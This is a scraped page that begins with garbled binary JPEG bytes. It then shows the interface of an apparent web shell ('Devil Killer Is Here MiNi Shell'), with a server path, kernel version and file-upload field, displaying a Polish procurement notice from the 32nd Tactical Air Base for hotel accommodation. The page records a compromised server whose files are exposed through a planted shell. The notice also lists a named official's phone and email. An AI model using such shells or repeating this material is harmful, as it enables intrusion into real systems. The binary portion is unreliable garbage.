JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250429/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250429/0021082201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie hotelarskich usług noclegowych w rejonie miejscowości Krzesiny/k. Poznania </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">32 Baza Lotnictwa Taktycznego w Łasku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730097572</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">9 - go Maja 95</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łask</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">32bltprz@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://32blt.wp.mil.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Skarb Państwa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie hotelarskich usług noclegowych w rejonie miejscowości Krzesiny/k. Poznania </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4b7bdd24-209b-401b-8cd4-17a8f09784df</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00210822</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00124761/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Hotelarskie usługi noclegowe</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1102078 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest za pośrednictwem elektronicznej platformy zakupowej: https://platformazakupowa.pl/transakcja/1102078.<br/>Zmiany ogłoszenia, wyjaśnienia treści SWZ, składanie ofert oraz komunikacja między Wykonawcą, a Zamawiającym odbywać się będzie poprzez platformę zakupową.<br/>Oferta, dokumenty i oświadczenia składane przez wykonawcę powinny być sporządzona w języku polskim. <br/>W celu skrócenia czasu udzielenia odpowiedzi na pytania komunikacja między Zamawiającym odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego&#34;.<br/>Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której adresatem jest konkretny Wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Oferta, wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym. W procesie składania oferty, wniosku w tym przedmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty Wykonawca składa bezpośrednio na dokumencie, który następnie przesyła do systemu.<br/>Podpisy kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”.<br/>Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>Formaty plików wykorzystywanych przez wykonawców powinny być zgodne<br/>z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”.<br/>Zamawiający rekomenduje następujący format przesyłanych danych: .pdf .doc .docx .rtf .xls .odt. ze szczególnym wskazaniem na .pdf.<br/>W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip .7Z .<br/>Sposób sporządzenia dokumentów elektronicznych lub ich cyfrowego odwzorowania musi być zgodny z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.<br/>Zamawiający, zgodnie z § 11 ust. 2 ROZPORZĄDZENIA PREZESA RADY MINISTRÓW z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem platformazakupowa.pl, tj.:<br/>- stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>- komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram,<br/>-procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>-zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>-włączona obsługa JavaScript,<br/>-zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>- Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>-Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/><br/>Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W związku z przetwarzaniem danych osobowych Zamawiający informuje, że:<br/>1. Administratorem danych osobowych jest: 32 Baza Lotnictwa Taktycznego w Łasku, 98-100 Łask, ul. 9-go Maja 95.<br/>2. Inspektorem ochrony danych osobowych w 32. Bazie Lotnictwa Taktycznego w Łasku jest Pan Paweł Rogala, tel. 261 554 639, email: p.rogala@ron.mil.pl.<br/>3. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia niniejszego postępowania o udzielenie zamówienia publicznego nr referencyjny: 29/TP2/2025.<br/>4. Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z 2024 r. poz. 1320), dalej „ustawa Pzp”.<br/>5. Zgodnie z art. 78 ust. 1 ustawy Pzp, dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6. Obowiązek podania danych osobowych Wykonawcy lub osób występujących w jego imieniu jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>7. W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>8. Wykonawcy przysługuje:<br/>−na podstawie art. 15 RODO prawo dostępu do danych osobowych;<br/>−na podstawie art. 16 RODO prawo do sprostowania danych osobowych;<br/>−na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>−prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy przetwarzanie danych osobowych narusza przepisy RODO.<br/>9. Wykonawcy nie przysługuje:<br/>−w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">29/TP2/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 248868,45 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa polegająca na świadczeniu usług hotelarskich i noclegowych dla żołnierzy i personelu 32 BLT w Łasku, łącznie dla 89 osób, w podziale na części:<br/>Część 1 – nocleg dla 18 osób w pokojach jedno lub wieloosobowych;<br/>dwuosobowym.<br/>2. Zakwaterowanie w ramach 1-części zamówienia odbędzie się w następujących terminach:<br/>od 02.06.2025 r. – do 05.06.2025 r. (3 doby hotelowe)<br/>od 09.06.2025 r. – do 12.06.2025 r. (3 doby hotelowe)<br/>od 16.06.2025 r. – do 18.06.2025 r. (2 doby hotelowe)<br/>od 23.06.2025 r. – do 26.06.2025 r. (3 doby hotelowe)<br/>od 30.06.2025 r. – do 03.07.2025 r. (3 doby hotelowe)<br/>od 07.07.2025 r. – do 10.07.2025 r. (3 doby hotelowe)<br/>od 14.07.2025 r. – do 18.07.2025 r. (4 doby hotelowe)<br/>3. Wykonawca wg własnych możliwości może zaproponować Zamawiającemu zakwaterowanie w pokojach wyłącznie jednoosobowych, dwuosobowych, trzyosobowych lub czteroosobowych.<br/>4. Wykonawca składając ofertę obligatoryjnie winien zaoferować Zamawiającemu dla części 1 zamówienia co najmniej 2 pokoje do pojedynczego zakwaterowania jednej osoby.<br/>5. Wykonawca składając ofertę na poszczególną część zamówienia potwierdza możliwość zakwaterowania wskazanej w w tej części liczby osób odpowiednio: 2, 17 lub 18 osób we wszystkich ww. dobach hotelowych (w zależności od nr części).<br/>6. Wykonawca składając ofertę na więcej niż jedną część zamówienia potwierdza możliwość zapewnienia jednoczesnego zakwaterowania sumy osób z każdej deklarowanej części w ww. terminach.<br/>7. Szczegółowy opis przedmiotu zamówienia oraz wymagania jakościowe odnoszące się do głównych elementów zamówienia zawiera załącznik nr 5 do SWZ- Opis przedmiotu zamówienia.<br/>8. Sposób realizacji przedmiotu zamówienia określa również załącznik nr 4 do SWZ – wzór umowy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 4897,47 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55110000-4 - Hotelarskie usługi noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-06-01 do 2025-07-19</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">OCENA OFERT:<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą sumę punktów w oparciu o ustalone kryterium cena 100%.<br/>Kryterium „Cena oferty” (C) będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu ofertowym na podstawie wyliczeń w formularzu cenowym.<br/>Ilość punktów w tym kryterium zostanie obliczona na podstawie wzoru w SWZ.<br/>Zamawiający dokona oceny ofert przyznając punkty w kryterium: cena oferty przyjmując zasadę, że 1%=1 punkt.<br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 100. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/><br/>Oferta, która otrzyma najwięcej punktów w kryterium: „cena oferty” (C) zostanie uznana za najkorzystniejszą, a pozostałe oferty będą sklasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.<br/>Jeżeli wybór oferty najkorzystniejszej będzie niemożliwy z uwagi na to, że zostały złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty do złożenia ofert dodatkowych.<br/>Brak określenia w ofercie ceny spowoduje odrzucenie oferty jako niezgodnej z treścią SWZ.<br/><br/>SPOSÓB OBLICZENIA CENY:<br/>Cena oferty uwzględniać powinna wszystkie zobowiązania związane z realizacją zamówienia, musi być skalkulowania w walucie polskiego złotego (PLN) co najmniej cyfrowo, z wyodrębnieniem wartości należnego podatku VAT za każdą część zamówienia odrębnie.<br/>Cena podana w ofercie to cena ryczałtowa i powinna obejmować wszystkie koszty powstałe w wyniku realizacji zamówienia zgodnie z warunkami stawianymi przez Zamawiającego w ramach części zamówienia.<br/>Cena może być tylko jedna, nie dopuszcza się składania ofert wariantowych.<br/>Cena nie ulega zmianie przez okres ważności oferty (termin związania ofertą) oraz okres realizacji zamówienia z zastrzeżeniem dopuszczalnych zmian w umowie.<br/>Cena netto to cena ustalona za jednostkę usługi, której ilość lub liczba jest wyrażona w jednostkach miar – wynagrodzenie za jedną dobę hotelową za jedną osobę (bez kwoty podatku VAT).<br/>Wartość netto to wartość usługi, bez kwoty podatku (tj. iloczyn ceny jednostkowej netto i ilości osobodób hotelowych).<br/>Podatek VAT to kwota podatku od towarów i usług, obliczona według obowiązującej stawki procentowej.<br/>Wartość brutto to całkowita wartość przedmiotu zamówienia - usługi wraz z kwotą podatku VAT (suma wartości netto i wartości podatku VAT), na którą składa się koszt wykonania usługi w części od 1 do 6, zgodnie z dokumentacją zamówienia.<br/>Podstawę oceny i porównania ofert stanowi cena brutto (wartość brutto) wyliczona wpisana w formularzu ofertowym (załącznik nr 1 do SWZ) za daną część zamówienia.<br/>W przypadku rozbieżności kwoty netto oraz kwoty brutto Zamawiający przyjmie, że Wykonawca za realizację zamówienia oferuje wskazaną w formularzu kwotę netto, do której doliczony zostanie należny podatek Vat.<br/>W przypadku rozbieżności w zakresie kwoty w formularzu cenowym oraz formularzu ofertowym Zamawiający przyjmie, że Wykonawca oferuje wykonanie usługi za cenę wskazaną w formularzu cenowym i taką też przyjmie do oceny i porównania ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa polegająca na świadczeniu usług hotelarskich i noclegowych dla żołnierzy i personelu 32 BLT w Łasku, łącznie dla 89 osób, w podziale na części:<br/><br/>Część 2 – nocleg dla 18 osób w pokojach jedno lub wieloosobowych;<br/>dwuosobowym.<br/>2. Zakwaterowanie w ramach 2 części zamówienia odbędzie się w następujących<br/>terminach:<br/>od 02.06.2025 r. – do 05.06.2025 r. (3 doby hotelowe)<br/>od 09.06.2025 r. – do 12.06.2025 r. (3 doby hotelowe)<br/>od 16.06.2025 r. – do 18.06.2025 r. (2 doby hotelowe)<br/>od 23.06.2025 r. – do 26.06.2025 r. (3 doby hotelowe)<br/>od 30.06.2025 r. – do 03.07.2025 r. (3 doby hotelowe)<br/>od 07.07.2025 r. – do 10.07.2025 r. (3 doby hotelowe)<br/>od 14.07.2025 r. – do 18.07.2025 r. (4 doby hotelowe)<br/><br/>3. Wykonawca wg własnych możliwości może zaproponować Zamawiającemu<br/>zakwaterowanie w pokojach wyłącznie jednoosobowych, dwuosobowych,<br/>trzyosobowych lub czteroosobowych.<br/>4. Wykonawca składając ofertę obligatoryjnie winien zaoferować Zamawiającemu dla części 2 zamówienia co najmniej 2 pokoje do pojedynczego zakwaterowania jednej osoby.<br/>5. Wykonawca składając ofertę na poszczególną część zamówienia potwierdza możliwość zakwaterowania wskazanej w w tej części liczby osób odpowiednio: 2, 17 lub 18 osób we wszystkich ww. dobach hotelowych (w zależności od nr części).<br/>6. Wykonawca składając ofertę na więcej niż jedną część zamówienia potwierdza<br/>możliwość zapewnienia jednoczesnego zakwaterowania sumy osób z każdej<br/>deklarowanej części w ww. terminach.<br/>7. Szczegółowy opis przedmiotu zamówienia oraz wymagania jakościowe odnoszące się do głównych elementów zamówienia zawiera załącznik nr 5 do SWZ- Opis przedmiotu zamówienia.<br/>8. Sposób realizacji przedmiotu zamówienia określa również załącznik nr 4 do SWZ –wzór umowy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 48970,47 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55110000-4 - Hotelarskie usługi noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-06-01 do 2025-07-19</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">OCENA OFERT:<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą sumę punktów w oparciu o ustalone kryterium cena 100%.<br/>Kryterium „Cena oferty” (C) będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu ofertowym na podstawie wyliczeń w formularzu cenowym.<br/>Ilość punktów w tym kryterium zostanie obliczona na podstawie wzoru w SWZ.<br/>Zamawiający dokona oceny ofert przyznając punkty w kryterium: cena oferty przyjmując zasadę, że 1%=1 punkt.<br/>Oferta z 